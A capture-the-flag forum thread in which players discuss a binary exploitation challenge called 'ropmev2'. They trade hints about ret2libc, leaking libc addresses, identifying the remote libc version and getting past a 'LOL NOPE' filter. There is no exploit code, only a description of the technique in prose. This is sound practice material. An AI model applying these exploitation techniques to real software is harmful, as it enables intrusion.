Finally… Took me some time to figure out how to bypass the LOL NOPE message. Done leaking and using ret2libc.
@ypl said:
Just did it. Feel free to PM if anyone needs help! I also did this one without leaking libc addresses. Actually I tried leaking but the addresses I leaked just didn’t match any libc versions in the libc database (I was using libc.blukat.me)…I would much appreciate if anyone could tell me what is going on with the libc version. Thanks!
Nothing strange with libc, are you sure you leaked them correctly?
I wasted a lot of time on ret2libc, before just setting up a frame and jumping through that instead.
Just finished this awesome challenge! I’ve spent the better part of week figuring this out, and I learned so much in the process. ROP is truly a beautiful exploitation technique. I wonder if there is any kind of defense against this at all.
Most frustrating part on my was that I put the payload to deal with the mangler up in front and right after it my code to leak data. It would segfault while outputting said data. All registers were set up correctly, I even made my own version of this binary and there it would work. Hours it took me to figure out. In the end, it turned out that rsp was pointing just above my payload and it was printf itself that was mangling my payload.
Probably a n00b lesson, but not one I’ll forget soon.
Anyway, loved the challenge. Multiple techniques involved, multi stage, and a cheeky little twist at the end. Well done, sir.
Hi all.
im need help. Im wrout script that works at local machine but doesnt work on remote. I use two-step exploit, on fisrt step I found address a marker-function(printf or read), on libc.bulk.me I found version libc and got EOF on the second step. When i use local libc on local machine Ive got shell.
Can anybodi give advice what direction I should dig?
I`ve corrected mistake so I got LOL NOPE but what can I do with it?
@fr0ster , you just need to accomplish the same thing in a different way. DM me if you need more help.
Hey all,
Can anyone explain how can I leak the remote printf() address?
When passing the DEBUG input, the function returns the location of the input buffer. I’m looking at the X64 calling convention and I can’t get how I can use that address to calculate printf() or any other libc function remote address.
The payload is clear in my mind, just need a little hint on this one to continue working.
Any indication or hint would be much appreciated!
Hi guys, could you give me a hint how to bypass LOL NOPE.. I already try any command, and I also try not to use ret2libc, but still get the LOL NOPE.
Finally got it, thanks @yb4Iym8f88 , but i don’t understand why I can’t get the list of files in the directory, i tried it in local and it worked, but not in the remote server.
Done and Dusted! That should have been an fairly easy challenge for myself… BUT small bug in my logic allowed my function to work locally but not remotely so spend half a day going round in circles confirming that my LIBC version was indeed correct… Lets just say that was FUN!! Thanks to @R4J 
Can I get a PM from anyone on ropmev2, I have gotten the LOL NOPE message, tried using other means of leaking flag, no thing so far
Anyone encountered the problem when trying to leak adresses of libc functions on the remote server, that all functions have the same address? On my local machine i get different addresses for different functions, but on the server they are all the same. This makes it impossible to determine which libc version is used. I have no clue how the program can work, if all entries of the got table point to the same address… Any ideas on this?
Beware of some rabbit holes
The author of this challenge is brilliant. I really enjoyed it.